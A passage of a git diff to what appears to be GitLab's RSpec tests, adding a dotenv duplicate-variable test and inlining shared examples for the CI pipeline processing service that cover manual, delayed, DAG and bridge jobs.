already exists.") + expect(subject[:http_status]).to eq(:bad_request) + end + end + + context 'when dotenv variables have duplicate variables' do + let!(:artifact) { create(:ci_job_artifact, :dotenv, job: build) } + let(:blob) do + <<~EOS + KEY1=VAR1 + KEY2=VAR2 + KEY2=VAR3 + KEY1=VAR4 + EOS + end + + before do + allow(artifact).to receive(:each_blob).and_yield(blob) + end + + it 'latest values get used' do + subject + + expect(subject[:status]).to eq(:success) + + expect(build.job_variables.as_json).to contain_exactly( + hash_including('key' => 'KEY1', 'value' => 'VAR4'), + hash_including('key' => 'KEY2', 'value' => 'VAR3')) + end + end + context 'when parse error happens' do before do allow(service).to receive(:scan_line!) { raise described_class::ParserError, 'Invalid Format' } diff --git a/spec/services/ci/pipeline_processing/atomic_processing_service_spec.rb b/spec/services/ci/pipeline_processing/atomic_processing_service_spec.rb index a66d3898c5c..02f8f2dd99f 100644 --- a/spec/services/ci/pipeline_processing/atomic_processing_service_spec.rb +++ b/spec/services/ci/pipeline_processing/atomic_processing_service_spec.rb @@ -1,12 +1,1106 @@ # frozen_string_literal: true require 'spec_helper' -require_relative 'shared_processing_service' -require_relative 'shared_processing_service_tests_with_yaml' RSpec.describe Ci::PipelineProcessing::AtomicProcessingService do - it_behaves_like 'Pipeline Processing Service' - it_behaves_like 'Pipeline Processing Service Tests With Yaml' + describe 'Pipeline Processing Service Tests With Yaml' do + let_it_be(:project) { create(:project, :repository) } + let_it_be(:user) { project.owner } + + where(:test_file_path) do + Dir.glob(Rails.root.join('spec/services/ci/pipeline_processing/test_cases/*.yml')) + end + + with_them do + let(:test_file) { YAML.load_file(test_file_path) } + let(:pipeline) { Ci::CreatePipelineService.new(project, user, ref: 'master').execute(:pipeline).payload } + + before do + stub_ci_pipeline_yaml_file(YAML.dump(test_file['config'])) + end + + it 'follows transitions' do + expect(pipeline).to be_persisted + Sidekiq::Worker.drain_all # ensure that all async jobs are executed + check_expectation(test_file.dig('init', 'expect'), "init") + + test_file['transitions'].each_with_index do |transition, idx| + event_on_jobs(transition['event'], transition['jobs']) + Sidekiq::Worker.drain_all # ensure that all async jobs are executed + check_expectation(transition['expect'], "transition:#{idx}") + end + end + + private + + def check_expectation(expectation, message) + expect(current_state.deep_stringify_keys).to eq(expectation), message + end + + def current_state + # reload pipeline and all relations + pipeline.reload + + { + pipeline: pipeline.status, + stages: pipeline.stages.pluck(:name, :status).to_h, + jobs: pipeline.latest_statuses.pluck(:name, :status).to_h + } + end + + def event_on_jobs(event, job_names) + statuses = pipeline.latest_statuses.by_name(job_names).to_a + expect(statuses.count).to eq(job_names.count) # ensure that we have the same counts + + statuses.each do |status| + if event == 'play' + status.play(user) + else + status.public_send("#{event}!") + end + end + end + end + end + + describe 'Pipeline Processing Service' do + let(:project) { create(:project, :repository) } + let(:user) { project.owner } + + let(:pipeline) do + create(:ci_empty_pipeline, ref: 'master', project: project) + end + + context 'when simple pipeline is defined' do + before do + create_build('linux', stage_idx: 0) + create_build('mac', stage_idx: 0) + create_build('rspec', stage_idx: 1) + create_build('rubocop', stage_idx: 1) + create_build('deploy', stage_idx: 2) + end + + it 'processes a pipeline', :sidekiq_inline do + expect(process_pipeline).to be_truthy + + succeed_pending + + expect(builds.success.count).to eq(2) + + succeed_pending + + expect(builds.success.count).to eq(4) + + succeed_pending + + expect(builds.success.count).to eq(5) + end + + it 'does not process pipeline if existing stage is running' do + expect(process_pipeline).to be_truthy + expect(builds.pending.count).to eq(2) + + expect(process_pipeline).to be_falsey + expect(builds.pending.count).to eq(2) + end + end + + context 'custom stage with first job allowed to fail' do + before do + create_build('clean_job', stage_idx: 0, allow_failure: true) + create_build('test_job', stage_idx: 1, allow_failure: true) + end + + it 'automatically triggers a next stage when build finishes', :sidekiq_inline do + expect(process_pipeline).to be_truthy + expect(builds_statuses).to eq ['pending'] + + fail_running_or_pending + + expect(builds_statuses).to eq %w(failed pending) + + fail_running_or_pending + + expect(pipeline.reload).to be_success + end + end + + context 'when optional manual actions are defined', :sidekiq_inline do + before do + create_build('build', stage_idx: 0) + create_build('test', stage_idx: 1) + create_build('test_failure', stage_idx: 2, when: 'on_failure') + create_build('deploy', stage_idx: 3) + create_build('production', stage_idx: 3, when: 'manual', allow_failure: true) + create_build('cleanup', stage_idx: 4, when: 'always') + create_build('clear:cache', stage_idx: 4, when: 'manual', allow_failure: true) + end + + context 'when builds are successful' do + it 'properly processes the pipeline' do + expect(process_pipeline).to be_truthy + expect(builds_names).to eq ['build'] + expect(builds_statuses).to eq ['pending'] + + succeed_running_or_pending + + expect(builds_names).to eq %w(build test) + expect(builds_statuses).to eq %w(success pending) + + succeed_running_or_pending + + expect(builds_names).to eq %w(build test deploy production) + expect(builds_statuses).to eq %w(success success pending manual) + + succeed_running_or_pending + + expect(builds_names).to eq %w(build test deploy production cleanup clear:cache) + expect(builds_statuses).to eq %w(success success success manual pending manual) + + succeed_running_or_pending + + expect(builds_statuses).to eq %w(success success success manual success manual) + expect(pipeline.reload.status).to eq 'success' + end + end + + context 'when test job fails' do + it 'properly processes the pipeline' do + expect(process_pipeline).to be_truthy + expect(builds_names).to eq ['build'] + expect(builds_statuses).to eq ['pending'] + + succeed_running_or_pending + + expect(builds_names).to eq %w(build test) + expect(builds_statuses).to eq %w(success pending) + + fail_running_or_pending + + expect(builds_names).to eq %w(build test test_failure) + expect(builds_statuses).to eq %w(success failed pending) + + succeed_running_or_pending + + expect(builds_names).to eq %w(build test test_failure cleanup) + expect(builds_statuses).to eq %w(success failed success pending) + + succeed_running_or_pending + + expect(builds_statuses).to eq %w(success failed success success) + expect(pipeline.reload.status).to eq 'failed' + end + end + + context 'when test and test_failure jobs fail' do + it 'properly processes the pipeline' do + expect(process_pipeline).to be_truthy + expect(builds_names).to eq ['build'] + expect(builds_statuses).to eq ['pending'] + + succeed_running_or_pending + + expect(builds_names).to eq %w(build test) + expect(builds_statuses).to eq %w(success pending) + + fail_running_or_pending + + expect(builds_names).to eq %w(build test test_failure) + expect(builds_statuses).to eq %w(success failed pending) + + fail_running_or_pending + + expect(builds_names).to eq %w(build test test_failure cleanup) + expect(builds_statuses).to eq %w(success failed failed pending) + + succeed_running_or_pending + + expect(builds_names).to eq %w(build test test_failure cleanup) + expect(builds_statuses).to eq %w(success failed failed success) + expect(pipeline.reload.status).to eq('failed') + end + end + + context 'when deploy job fails' do + it 'properly processes the pipeline' do + expect(process_pipeline).to be_truthy + expect(builds_names).to eq ['build'] + expect(builds_statuses).to eq ['pending'] + + succeed_running_or_pending + + expect(builds_names).to eq %w(build test) + expect(builds_statuses).to eq %w(success pending) + + succeed_running_or_pending + + expect(builds_names).to eq %w(build test deploy production) + expect(builds_statuses).to eq %w(success success pending manual) + + fail_running_or_pending + + expect(builds_names).to eq %w(build test deploy production cleanup) + expect(builds_statuses).to eq %w(success success failed manual pending) + + succeed_running_or_pending + + expect(builds_statuses).to eq %w(success success failed manual success) + expect(pipeline.reload).to be_failed + end + end + + context 'when build is canceled in the second stage' do + it 'does not schedule builds after build has been canceled' do + expect(process_pipeline).to be_truthy + expect(builds_names).to eq ['build'] + expect(builds_statuses).to eq ['pending'] + + succeed_running_or_pending + + expect(builds.running_or_pending).not_to be_empty + expect(builds_names).to eq %w(build test) + expect(builds_statuses).to eq %w(success pending) + + cancel_running_or_pending + + expect(builds.running_or_pending).to be_empty + expect(builds_names).to eq %w[build test] + expect(builds_statuses).to eq %w[success canceled] + expect(pipeline.reload).to be_canceled + end + end + + context 'when listing optional manual actions' do + it 'returns only for skipped builds' do + # currently all builds are created + expect(process_pipeline).to be_truthy + expect(manual_actions).to be_empty + + # succeed stage build + succeed_running_or_pending + + expect(manual_actions).to be_empty + + # succeed stage test + succeed_running_or_pending + + expect(manual_actions).to be_one # production + + # succeed stage deploy + succeed_running_or_pending + + expect(manual_actions).to be_many # production and clear cache + end + end + end + + context 'when delayed jobs are defined', :sidekiq_inline do + context 'when the scene is timed incremental rollout' do + before do + create_build('build', stage_idx: 0) + create_build('rollout10%', **delayed_options, stage_idx: 1) + create_build('rollout100%', **delayed_options, stage_idx: 2) + create_build('cleanup', stage_idx: 3) + + allow(Ci::BuildScheduleWorker).to receive(:perform_at) + end + + context 'when builds are successful' do + it 'properly processes the pipeline' do + expect(process_pipeline).to be_truthy + expect(builds_names_and_statuses).to eq({ 'build': 'pending' }) + + succeed_pending + + expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'scheduled' }) + + travel_to 2.minutes.from_now do + enqueue_scheduled('rollout10%') + end + succeed_pending + + expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'success', 'rollout100%': 'scheduled' }) + + travel_to 2.minutes.from_now do + enqueue_scheduled('rollout100%') + end + succeed_pending + + expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'success', 'rollout100%': 'success', 'cleanup': 'pending' }) + + succeed_pending + + expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'success', 'rollout100%': 'success', 'cleanup': 'success' }) + expect(pipeline.reload.status).to eq 'success' + end + end + + context 'when build job fails' do + it 'properly processes the pipeline' do + expect(process_pipeline).to be_truthy + expect(builds_names_and_statuses).to eq({ 'build': 'pending' }) + + fail_running_or_pending + + expect(builds_names_and_statuses).to eq({ 'build': 'failed' }) + expect(pipeline.reload.status).to eq 'failed' + end + end + + context 'when rollout 10% is unscheduled' do + it 'properly processes the pipeline' do + expect(process_pipeline).to be_truthy + expect(builds_names_and_statuses).to eq({ 'build': 'pending' }) + + succeed_pending + + expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'scheduled' }) + + unschedule + + expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'manual' }) + expect(pipeline.reload.status).to eq 'manual' + end + + context 'when user plays rollout 10%' do + it 'schedules rollout100%' do + process_pipeline + succeed_pending + unschedule + play_manual_action('rollout10%') + succeed_pending + + expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'success', 'rollout100%': 'scheduled' }) + expect(pipeline.reload.status).to eq 'scheduled' + end + end + end + + context 'when rollout 10% fails' do + it 'properly processes the pipeline' do + expect(process_pipeline).to be_truthy + expect(builds_names_and_statuses).to eq({ 'build': 'pending' }) + + succeed_pending + + expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'scheduled' }) + + travel_to 2.minutes.from_now do + enqueue_scheduled('rollout10%') + end + fail_running_or_pending + + expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'failed' }) + expect(pipeline.reload.status).to eq 'failed' + end + + context 'when user retries rollout 10%' do + it 'does not schedule rollout10% again' do + process_pipeline + succeed_pending + enqueue_scheduled('rollout10%') + fail_running_or_pending + retry_build('rollout10%') + + expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'pending' }) + expect(pipeline.reload.status).to eq 'running' + end + end + end + + context 'when rollout 10% is played immidiately' do + it 'properly processes the pipeline' do + expect(process_pipeline).to be_truthy + expect(builds_names_and_statuses).to eq({ 'build': 'pending' }) + + succeed_pending + + expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'scheduled' }) + + play_manual_action('rollout10%') + + expect(builds_names_and_statuses).to eq({ 'build': 'success', 'rollout10%': 'pending' }) + expect(pipeline.reload.status).to eq 'running' + end + end + end + + context 'when only one scheduled job exists in a pipeline' do + before do + create_build('delayed', **delayed_options, stage_idx: 0) + + allow(Ci::BuildScheduleWorker).to receive(:perform_at) + end + + it 'properly processes the pipeline' do + expect(process_pipeline).to be_truthy + expect(builds_names_and_statuses).to eq({ 'delayed': 'scheduled' }) + + expect(pipeline.reload.status).to eq 'scheduled' + end + end + + context 'when there are two delayed jobs in a stage' do + before do + create_build('delayed1', **delayed_options, stage_idx: 0) + create_build('delayed2', **delayed_options, stage_idx: 0) + create_build('job', stage_idx: 1) + + allow(Ci::BuildScheduleWorker).to receive(:perform_at) + end + + it 'blocks the stage until all scheduled jobs finished' do + expect(process_pipeline).to be_truthy + expect(builds_names_and_statuses).to eq({ 'delayed1': 'scheduled', 'delayed2': 'scheduled' }) + + travel_to 2.minutes.from_now do + enqueue_scheduled('delayed1') + end + + expect(builds_names_and_statuses).to eq({ 'delayed1': 'pending', 'delayed2': 'scheduled' }) + expect(pipeline.reload.status).to eq 'running' + end + end + + context 'when a delayed job is allowed to fail' do + before do + create_build('delayed', **delayed_options, allow_failure: true, stage_idx: 0) + create_build('job', stage_idx: 1) + + allow(Ci::BuildScheduleWorker).to receive(:perform_at) + end + + it 'blocks the stage and continues after it failed' do + expect(process_pipeline).to be_truthy + expect(builds_names_and_statuses).to eq({ 'delayed': 'scheduled' }) + + travel_to 2.minutes.from_now do + enqueue_scheduled('delayed') + end + fail_running_or_pending + + expect(builds_names_and_statuses).to eq({ 'delayed': 'failed', 'job': 'pending' }) + expect(pipeline.reload.status).to eq 'pending' + end + end + end + + context 'when an exception is raised during a persistent ref creation' do + before do + successful_build('test', stage_idx: 0) + + allow_next_instance_of(Ci::PersistentRef) do |instance| + allow(instance).to receive(:delete_refs) { raise ArgumentError } + end + end + + it 'process the pipeline' do + expect { process_pipeline }.not_to raise_error + end + end + + context 'when there are manual action in earlier stages' do + context 'when first stage has only optional manual actions' do + before do + create_build('build', stage_idx: 0, when: 'manual', allow_failure: true) + create_build('check', stage_idx: 1) + create_build('test', stage_idx: 2) + + process_pipeline + end + + it 'starts from the second stage' do + expect(all_builds_statuses).to eq %w[manual pending created] + end + end + + context 'when second stage has only optional manual actions' do + before do + create_build('check', stage_idx: 0) + create_build('build', stage_idx: 1, when: 'manual', allow_failure: true) + create_build('test', stage_idx: 2) + + process_pipeline + end + + it 'skips second stage and continues on third stage', :sidekiq_inline do + expect(all_builds_statuses).to eq(%w[pending created created]) + + builds.first.success + + expect(all_builds_statuses).to eq(%w[success manual pending]) + end + end + end + + context 'when there are only manual actions in stages' do + before do + create_build('image', stage_idx: 0, when: 'manual', allow_failure: true) + create_build('build', stage_idx: 1, when: 'manual', allow_failure: true) + create_build('deploy', stage_idx: 2, when: 'manual') + create_build('check', stage_idx: 3) + + process_pipeline + end + + it 'processes all jobs until blocking actions encountered' do + expect(all_builds_statuses).to eq(%w[manual manual manual created]) + expect(all_builds_names).to eq(%w[image build deploy check]) + + expect(pipeline.reload).to be_blocked + end + end + + context 'when there is only one manual action' do + before do + create_build('deploy', stage_idx: 0, when: 'manual', allow_failure: true) + + process_pipeline + end + + it 'skips the pipeline' do + expect(pipeline.reload).to be_skipped + end + + context 'when the action was played' do + before do + play_manual_action('deploy') + end + + it 'queues the action and pipeline', :sidekiq_inline do + expect(all_builds_statuses).to eq(%w[pending]) + + expect(pipeline.reload).to be_pending + end + end + end + + context 'when blocking manual actions are defined', :sidekiq_inline do + before do + create_build('code:test', stage_idx: 0) + create_build('staging:deploy', stage_idx: 1, when: 'manual') + create_build('staging:test', stage_idx: 2, when: 'on_success') + create_build('production:deploy', stage_idx: 3, when: 'manual') + create_build('production:test', stage_idx: 4, when: 'always') + end + + context 'when first stage succeeds' do + it 'blocks pipeline on stage with first manual action' do + process_pipeline + + expect(builds_names).to eq %w[code:test] + expect(builds_statuses).to eq %w[pending] + expect(pipeline.reload.status).to eq 'pending' + + succeed_running_or_pending + + expect(builds_names).to eq %w[code:test staging:deploy] + expect(builds_statuses).to eq %w[success manual] + expect(pipeline.reload).to be_manual + end + end + + context 'when first stage fails' do + it 'does not take blocking action into account' do + process_pipeline + + expect(builds_names).to eq %w[code:test] + expect(builds_statuses).to eq %w[pending] + expect(pipeline.reload.status).to eq 'pending' + + fail_running_or_pending + + expect(builds_names).to eq %w[code:test production:test] + expect(builds_statuses).to eq %w[failed pending] + + succeed_running_or_pending + + expect(builds_statuses).to eq %w[failed success] + expect(pipeline.reload).to be_failed + end + end + + context 'when pipeline is promoted sequentially up to the end' do + before do + # Users need ability to merge into a branch in order to trigger + # protected manual actions. + # + create(:protected_branch, :developers_can_merge, + name: 'master', project: project) + end + + it 'properly processes entire pipeline' do + process_pipeline + + expect(builds_names).to eq %w[code:test] + expect(builds_statuses).to eq %w[pending] + + succeed_running_or_pending + + expect(builds_names).to eq %w[code:test staging:deploy] + expect(builds_statuses).to eq %w[success manual] + expect(pipeline.reload).to be_manual + + play_manual_action('staging:deploy') + + expect(builds_statuses).to eq %w[success pending] + + succeed_running_or_pending + + expect(builds_names).to eq %w[code:test staging:deploy staging:test] + expect(builds_statuses).to eq %w[success success pending] + + succeed_running_or_pending + + expect(builds_names).to eq %w[code:test staging:deploy staging:test + production:deploy] + expect(builds_statuses).to eq %w[success success success manual] + + expect(pipeline.reload).to be_manual + expect(pipeline.reload).to be_blocked + expect(pipeline.reload).not_to be_active + expect(pipeline.reload).not_to be_complete + + play_manual_action('production:deploy') + + expect(builds_statuses).to eq %w[success success success pending] + expect(pipeline.reload).to be_running + + succeed_running_or_pending + + expect(builds_names).to eq %w[code:test staging:deploy staging:test + production:deploy production:test] + expect(builds_statuses).to eq %w[success success success success pending] + expect(pipeline.reload).to be_running + + succeed_running_or_pending + + expect(builds_names).to eq %w[code:test staging:deploy staging:test + production:deploy production:test] + expect(builds_statuses).to eq %w[success success success success success] + expect(pipeline.reload).to be_success + end + end + end + + context 'when second stage has only on_failure jobs', :sidekiq_inline do + before do + create_build('check', stage_idx: 0) + create_build('build', stage_idx: 1, when: 'on_failure') + create_build('test', stage_idx: 2) + + process_pipeline + end + + it 'skips second stage and continues on third stage' do + expect(all_builds_statuses).to eq(%w[pending created created]) + + builds.first.success + + expect(all_builds_statuses).to eq(%w[success skipped pending]) + end + end + + context 'when failed build in the middle stage is retried', :sidekiq_inline do + context 'when failed build is the only unsuccessful build in the stage' do + before do + create_build('build:1', stage_idx: 0) + create_build('build:2', stage_idx: 0) + create_build('test:1', stage_idx: 1) + create_build('test:2', stage_idx: 1) + create_build('deploy:1', stage_idx: 2) + create_build('deploy:2', stage_idx: 2) + end + + it 'does trigger builds in the next stage' do + expect(process_pipeline).to be_truthy + expect(builds_names).to eq ['build:1', 'build:2'] + + succeed_running_or_pending + + expect(builds_names).to eq ['build:1', 'build:2', 'test:1', 'test:2'] + + pipeline.builds.find_by(name: 'test:1').success! + pipeline.builds.find_by(name: 'test:2').drop! + + expect(builds_names).to eq ['build:1', 'build:2', 'test:1', 'test:2'] + + Ci::Build.retry(pipeline.builds.find_by(name: 'test:2'), user).reset.success! + + expect(builds_names).to eq ['build:1', 'build:2', 'test:1', 'test:2', + 'test:2', 'deploy:1', 'deploy:2'] + end + end + end + + context 'when builds with auto-retries are configured', :sidekiq_inline do + before do + create_build('build:1', stage_idx: 0, user: user, options: { script: 'aa', retry: 2 }) + create_build('test:1', stage_idx: 1, user: user, when: :on_failure) + create_build('test:2', stage_idx: 1, user: user, options: { script: 'aa', retry: 1 }) + end + + it 'automatically retries builds in a valid order' do + expect(process_pipeline).to be_truthy + + fail_running_or_pending + + expect(builds_names).to eq %w[build:1 build:1] + expect(builds_statuses).to eq %w[failed pending] + + succeed_running_or_pending + + expect(builds_names).to eq %w[build:1 build:1 test:2] + expect(builds_statuses).to eq %w[failed success pending] + + succeed_running_or_pending + + expect(builds_names).to eq %w[build:1 build:1 test:2] + expect(builds_statuses).to eq %w[failed success success] + + expect(pipeline.reload).to be_success + end + end + + context 'when pipeline with needs is created', :sidekiq_inline do + let!(:linux_build) { create_build('linux:build', stage: 'build', stage_idx: 0) } + let!(:mac_build) { create_build('mac:build', stage: 'build', stage_idx: 0) } + let!(:linux_rspec) { create_build('linux:rspec', stage: 'test', stage_idx: 1, scheduling_type: :dag) } + let!(:linux_rubocop) { create_build('linux:rubocop', stage: 'test', stage_idx: 1, scheduling_type: :dag) } + let!(:mac_rspec) { create_build('mac:rspec', stage: 'test', stage_idx: 1, scheduling_type: :dag) } + let!(:mac_rubocop) { create_build('mac:rubocop', stage: 'test', stage_idx: 1, scheduling_type: :dag) } + let!(:deploy) { create_build('deploy', stage: 'deploy', stage_idx: 2) } + + let!(:linux_rspec_on_build) { create(:ci_build_need, build: linux_rspec, name: 'linux:build') } + let!(:linux_rubocop_on_build) { create(:ci_build_need, build: linux_rubocop, name: 'linux:build') } + + let!(:mac_rspec_on_build) { create(:ci_build_need, build: mac_rspec, name: 'mac:build') } + let!(:mac_rubocop_on_build) { create(:ci_build_need, build: mac_rubocop, name: 'mac:build') } + + it 'when linux:* finishes first it runs it out of order' do + expect(process_pipeline).to be_truthy + + expect(stages).to eq(%w(pending created created)) + expect(builds.pending).to contain_exactly(linux_build, mac_build) + + # we follow the single path of linux + linux_build.reset.success! + + expect(stages).to eq(%w(running pending created)) + expect(builds.success).to contain_exactly(linux_build) + expect(builds.pending).to contain_exactly(mac_build, linux_rspec, linux_rubocop) + + linux_rspec.reset.success! + + expect(stages).to eq(%w(running running created)) + expect(builds.success).to contain_exactly(linux_build, linux_rspec) + expect(builds.pending).to contain_exactly(mac_build, linux_rubocop) + + linux_rubocop.reset.success! + + expect(stages).to eq(%w(running running created)) + expect(builds.success).to contain_exactly(linux_build, linux_rspec, linux_rubocop) + expect(builds.pending).to contain_exactly(mac_build) + + mac_build.reset.success! + mac_rspec.reset.success! + mac_rubocop.reset.success! + + expect(stages).to eq(%w(success success pending)) + expect(builds.success).to contain_exactly( + linux_build, linux_rspec, linux_rubocop, mac_build, mac_rspec, mac_rubocop) + expect(builds.pending).to contain_exactly(deploy) + end + + context 'when one of the jobs is run on a failure' do + let!(:linux_notify) { create_build('linux:notify', stage: 'deploy', stage_idx: 2, when: 'on_failure', scheduling_type: :dag) } + + let!(:linux_notify_on_build) { create(:ci_build_need, build: linux_notify, name: 'linux:build') } + + context 'when another job in build phase fails first' do + it 'does skip linux:notify' do + expect(process_pipeline).to be_truthy + + mac_build.reset.drop! + linux_build.reset.success! + + expect(linux_notify.reset).to be_skipped + end + end + + context 'when linux:build job fails first' do + it 'does run linux:notify' do + expect(process_pipeline).to be_truthy + + linux_build.reset.drop! + + expect(linux_notify.reset).to be_pending + end + end + end + + context 'when there is a job scheduled with dag but no need (needs: [])' do + let!(:deploy_pages) { create_build('deploy_pages', stage: 'deploy', stage_idx: 2, scheduling_type: :dag) } + + it 'runs deploy_pages without waiting prior stages' do + expect(process_pipeline).to be_truthy + + expect(stages).to eq(%w(pending created pending)) + expect(builds.pending).to contain_exactly(linux_build, mac_build, deploy_pages) + + linux_build.reset.success! + deploy_pages.reset.success! + + expect(stages).to eq(%w(running pending running)) + expect(builds.success).to contain_exactly(linux_build, deploy_pages) + expect(builds.pending).to contain_exactly(mac_build, linux_rspec, linux_rubocop) + + linux_rspec.reset.success! + linux_rubocop.reset.success! + mac_build.reset.success! + mac_rspec.reset.success! + mac_rubocop.reset.success! + + expect(stages).to eq(%w(success success running)) + expect(builds.pending).to contain_exactly(deploy) + end + end + end + + context 'when a needed job is skipped', :sidekiq_inline do + let!(:linux_build) { create_build('linux:build', stage: 'build', stage_idx: 0) } + let!(:linux_rspec) { create_build('linux:rspec', stage: 'test', stage_idx: 1) } + let!(:deploy) { create_build('deploy', stage: 'deploy', stage_idx: 2, scheduling_type: :dag) } + + before do + create(:ci_build_need, build: deploy, name: 'linux:build') + end + + it 'skips the jobs depending on it' do + expect(process_pipeline).to be_truthy + + expect(stages).to eq(%w(pending created created)) + expect(all_builds.pending).to contain_exactly(linux_build) + + linux_build.reset.drop! + + expect(stages).to eq(%w(failed skipped skipped)) + expect(all_builds.failed).to contain_exactly(linux_build) + expect(all_builds.skipped).to contain_exactly(linux_rspec, deploy) + end + end + + context 'when a needed job is manual', :sidekiq_inline do + let!(:linux_build) { create_build('linux:build', stage: 'build', stage_idx: 0, when: 'manual', allow_failure: true) } + let!(:deploy) { create_build('deploy', stage: 'deploy', stage_idx: 1, scheduling_type: :dag) } + + before do + create(:ci_build_need, build: deploy, name: 'linux:build') + end + + it 'makes deploy DAG to be skipped' do + expect(process_pipeline).to be_truthy + + expect(stages).to eq(%w(skipped skipped)) + expect(all_builds.manual).to contain_exactly(linux_build) + expect(all_builds.skipped).to contain_exactly(deploy) + end + end + + context 'when a bridge job has parallel:matrix config', :sidekiq_inline do + let(:parent_config) do + <<-EOY + test: + stage: test + script: echo test + + deploy: + stage: deploy + trigger: + include: .child.yml + parallel: + matrix: + - PROVIDER: ovh + STACK: [monitoring, app] + EOY + end + + let(:child_config) do + <<-EOY + test: + stage: test + script: echo test + EOY + end + + let(:pipeline) do + Ci::CreatePipelineService.new(project, user, { ref: 'master' }).execute(:push).payload + end + + before do + allow_next_instance_of(Repository) do |repository| + allow(repository) + .to receive(:blob_data_at) + .with(an_instance_of(String), '.gitlab-ci.yml') + .and_return(parent_config) + + allow(repository) + .to receive(:blob_data_at) + .with(an_instance_of(String), '.child.yml') + .and_return(child_config) + end + end + + it 'creates pipeline with bridges, then passes the matrix variables to downstream jobs' do + expect(all_builds_names).to contain_exactly('test', 'deploy: [ovh, monitoring]', 'deploy: [ovh, app]') + expect(all_builds_statuses).to contain_exactly('pending', 'created', 'created') + + succeed_pending + + # bridge jobs directly transition to success + expect(all_builds_statuses).to contain_exactly('success', 'success', 'success') + + bridge1 = all_builds.find_by(name: 'deploy: [ovh, monitoring]') + bridge2 = all_builds.find_by(name: 'deploy: [ovh, app]') + + downstream_job1 = bridge1.downstream_pipeline.processables.first + downstream_job2 = bridge2.downstream_pipeline.processables.first + + expect(downstream_job1.scoped_variables.to_hash).to include('PROVIDER' => 'ovh', 'STACK' => 'monitoring') + expect(downstream_job2.scoped_variables.to_hash).to include('PROVIDER' => 'ovh', 'STACK' => 'app') + end + end + + context 'when a bridge job has invalid downstream project', :sidekiq_inline do + let(:config) do + <<-EOY + test: + stage: test + script: echo test + + deploy: + stage: deploy + trigger: + project: invalid-project + EOY + end + + let(:pipeline) do + Ci::CreatePipelineService.new(project, user, { ref: 'master' }).execute(:push).payload + end + + before do + stub_ci_pipeline_yaml_file(config) + end + + it 'creates a pipeline, then fails the bridge job' do + expect(all_builds_names).to contain_exactly('test', 'deploy') + expect(all_builds_statuses).to contain_exactly('pending', 'created') + + succeed_pending + + expect(all_builds_names).to contain_exactly('test', 'deploy') + expect(all_builds_statuses).to contain_exactly('success', 'failed') + end + end + + private + + def all_builds + pipeline.processables.order(:stage_idx, :id) + end + + def builds + all_builds.where.not(status: [:created, :skipped]) + end + + def stages + pipeline.reset.stages.map(&:status) + end + + def builds_names + builds.pluck(:name) + end + + def builds_names_and_statuses + builds.each_with_object({}) do |b, h| + h[b.name.to_sym] = b.status + h + end + end + + def all_builds_names + all_builds.pluck(:name) + end + + def builds_statuses + builds.pluck(:status) + end + + def all_builds_statuses + all_builds.pluck(:status) + end + + def succeed_pending + builds.pending.each do |build| + build.reset.success + end + end + + def succeed_running_or_pending + pipeline.builds.running_or_pending.each do |build| + build.reset.success + end + end + + def fail_running_or_pending + pipeline.builds.running_or_pending.each do |build| + build.reset.drop + end + end + + def cancel_running_or_pending + pipeline.builds.running_or_pending.each do |build| + build.reset.cancel + end + end + + def play_manual_action(name) + builds.find_by(name: name).play(user) + end + + def enqueue_scheduled(name) + builds.scheduled.find_by(name: name).enqueue_scheduled + end + + def retry_build(name) + Ci::Build.retry(builds.find_by(name: name), user) + end + + def manual_actions + pipeline.manual_actions.reload + end + + def create_build(name, **opts) + create(:ci_build, :created, pipeline: pipeline, name: name, **with_stage_opts(opts)) + end + + def successful_build(name, **opts) + create(:ci_build, :success, pipeline: pipeline, name: name, **with_stage_opts(opts)) + end + + def with_stage_opts(opts) + { stage: "stage-#{opts[:stage_idx].to_i}" }.merge(opts) + end + + def delayed_options + { when: 'delayed', options: { script: %w(echo), start_in: '1 minute' } } + end + + def unschedule + pipeline.builds.scheduled.map(&:unschedule) + end + end private diff --git a/spec/services/ci/pipeline_processing/shared_processing_service.rb b/spec/services/ci/pipeline_processing/shared_processing_service.rb deleted file mode 100644 index 8de9b308429..00000000000 --- a/spec/services/ci/pipeline_processing/shared_processing_service.rb +++ /dev/null @@ -1,1040 +0,0 @@ -# frozen_string_literal: true - -RSpec.shared_examples 'Pipeline Processing Service' do - let(:project) { create(:project, :repository) } - let(:user) { project.owner } - - let(:pipeline) do - create(:ci_empty_pipeline, ref: 'master', project: project) - end - - context 'when simple pipeline is defined' do - before do - create_build('linux', stage_idx: 0) - create_build('mac', stage_idx: 0) - create_build('rspec', stage_idx: 1) - create_build('rubocop', stage_idx: 1) - create_build('deploy', stage_idx: 2) - end - - it 'processes a pipeline', :sidekiq_inline do - expect(process_pipeline).to be_truthy - - succeed_pending - - expect(builds.success.count).to eq(2) - - succeed_pending - - expect(builds.success.count).to eq(4) - - succeed_pending - - expect(builds.success.count).to eq(5) - end - - it 'does not process pipeline if existing stage is running' do - expect(process_pipeline).to be_truthy - expect(builds.pending.count).to eq(2) - - expect(process_pipeline).to be_falsey - expect(builds.pending.count).to eq(2) - end - end - - context 'custom stage with first job allowed to fail' do - before do - create_build('clean_job', stage_idx: 0, allow_failure: true) - create_build('test_job', stage_idx: 1, allow_failure: true) - end - - it 'automatically triggers a next stage when build finishes', :sidekiq_inline do - expect(process_pipeline).to be_truthy - expect(builds_statuses).to eq ['pending'] - - fail_running_or_pending - - expect(builds_statuses).to eq %w(failed pending) - - fail_running_or_pending - - expect(pipeline.reload).to be_success - end - end - - context 'when optional manual actions are defined', :sidekiq_inline do - before do - create_build('build', stage_idx: 0) - create_build('test', stage_idx: 1) - create_build('test_failure', stage_idx: 2, when: 'on_failure') - create_build('deploy', stage_idx: 3) - create_build('production', stage_idx: 3, when: 'manual', allow_failure: true) - create_build('cleanup', stage_idx: 4, when: 'always') - create_build('clear:cache', stage_idx: 4, when: 'manual', allow_failure: true) - end - - context 'when builds are successful' do - it 'properly processes the pipeline' do - 